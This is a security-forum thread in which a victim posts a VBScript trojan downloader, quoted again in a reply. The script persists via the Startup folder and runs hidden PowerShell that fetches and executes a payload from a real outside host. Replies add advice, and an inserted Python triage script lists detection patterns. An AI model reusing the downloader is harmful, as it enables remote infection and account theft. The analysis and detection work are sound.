NotMikaa
Posted December 1, 2019

Hi! So I came about this being dumb and installed it. Didn't think anything of it at first until I noticed out of the corner of my eye that TeamViewer was opened and they were attempting to go into my Gmail. They've already looked into my PayPal.

    dim s15001
    const CONSOLE_HIDE=0
    const CONSOLE_SHOW=1
    const CMD_WAIT=true
    set oShell = wscript.createObject("WScript.Shell")
    set sysOb = createobject("scripting.filesystemobject")
    startup = oShell.specialfolders ("startup") & "\update.vbs"
    sysOb.copyfile wscript.scriptfullname,startup ,true
    oShell.run "cmd /c powers" & "hell " & "-ExecutionPolicy Bypass -windowstyle hidden -noexit -command [System.Net.WebClient]$webClient = New-Object System.Net.WebClient;[System.IO.Stream]$stream = $webClient.OpenRead('htt" & "p://" & "www.m9c.net/uploads/15744376681.jpg');[System.IO.StreamReader]$sr = New-Object System.IO.StreamReader -argumentList $stream;[string]$results = $sr.ReadToEnd();IEX $results", CONSOLE_HIDE, CMD_WAIT

Marcos (Administrators)
Posted December 1, 2019

A detection was added several days ago; the script is detected as the VBS/TrojanDownloader.Agent.SGV trojan. When the malware is detected, it should be cleaned without issues since it's a simple VB downloader script.
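
A static triage of this kind of script, as an added example that is not part of the thread and is not ESET's detection logic: it folds VBScript string concatenation before matching, because the posted script splits "powershell" and "http://" across literals. The indicator names, function names and the sample with its placeholder host are constructed for illustration.

```python
import re

# VBScript joins string literals with "&"; the posted script splits
# "powershell" and "http://" this way, so plain substring searches miss them.
CONCAT = re.compile(r'"\s*&\s*"')

# Behaviours visible in the posted script, matched on the folded text.
INDICATORS = {
    "startup_persistence": re.compile(
        r'specialfolders\s*\(\s*"startup"\s*\).*?copyfile\s+wscript\.scriptfullname',
        re.I | re.S),
    "hidden_powershell": re.compile(
        r'powershell\b.*?-w(indowstyle)?\s+hidden', re.I | re.S),
    "execution_policy_bypass": re.compile(r'-(executionpolicy|ep)\s+bypass', re.I),
    "web_download": re.compile(r'net\.webclient', re.I),
    "invoke_expression": re.compile(r'\b(iex|invoke-expression)\b', re.I),
}
URL = re.compile(r'https?://[^\s\'"()]+', re.I)

# Constructed sample: same structure as the posted script, placeholder host.
SAMPLE = r'''
set oShell = wscript.createObject("WScript.Shell")
set sysOb = createobject("scripting.filesystemobject")
startup = oShell.specialfolders ("startup") & "\update.vbs"
sysOb.copyfile wscript.scriptfullname,startup ,true
oShell.run "cmd /c powers" & "hell " & "-ExecutionPolicy Bypass -windowstyle hidden -command $s = (New-Object System.Net.WebClient).OpenRead('htt" & "p://" & "files.example.test/a.jpg');IEX $s", 0, true
'''

def fold_concatenation(vbs_source):
    """Merge adjacent string literals: "htt" & "p://" becomes "http://"."""
    return CONCAT.sub("", vbs_source)

def defang(url):
    """Rewrite a URL so it is not clickable when pasted into a report."""
    return url.replace("http", "hxxp", 1).replace(".", "[.]")

def triage(vbs_source):
    """Return (sorted indicator names, defanged URLs) for one script."""
    folded = fold_concatenation(vbs_source)
    hits = sorted(name for name, rx in INDICATORS.items() if rx.search(folded))
    return hits, [defang(u) for u in URL.findall(folded)]

if __name__ == "__main__":
    hits, urls = triage(SAMPLE)
    print("indicators:", ", ".join(hits))
    print("urls:", ", ".join(urls))
```

Run it over any `.vbs` files found in the user's Startup folder; a script that trips the persistence and download indicators together deserves a closer look.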

Nightowl (Most Valued Members)
Posted December 2, 2019 (edited)

On 12/1/2019 at 7:58 AM, NotMikaa said:

> Hi! So I came about this being dumb and installed it. Didn't think anything of it at first until I noticed out of the corner of my eye that TeamViewer was opened and they were attempting to go into my Gmail. They've already looked into my PayPal.
>
>     dim s15001
>     const CONSOLE_HIDE=0
>     const CONSOLE_SHOW=1
>     const CMD_WAIT=true
>     set oShell = wscript.createObject("WScript.Shell")
>     set sysOb = createobject("scripting.filesystemobject")
>     startup = oShell.specialfolders ("startup") & "\update.vbs"
>     sysOb.copyfile wscript.scriptfullname,startup ,true
>     oShell.run "cmd /c powers" & "hell " & "-ExecutionPolicy Bypass -windowstyle hidden -noexit -command [System.Net.WebClient]$webClient = New-Object System.Net.WebClient;[System.IO.Stream]$stream = $webClient.OpenRead('htt" & "p://" & "www.m9c.net/uploads/15744376681.jpg');[System.IO.StreamReader]$sr = New-Object System.IO.StreamReader -argumentList $stream;[string]$results = $sr.ReadToEnd();IEX $results", CONSOLE_HIDE, CMD_WAIT

You should secure your TeamViewer/AnyDesk or whatever your remote desktop software is. Put a good password and limit access only to your PCs.

Because they have got access to several accounts of yours, you should change all passwords now, and secure them with 2-step verification for more secure entry to your accounts.

Edited December 2, 2019 by Rami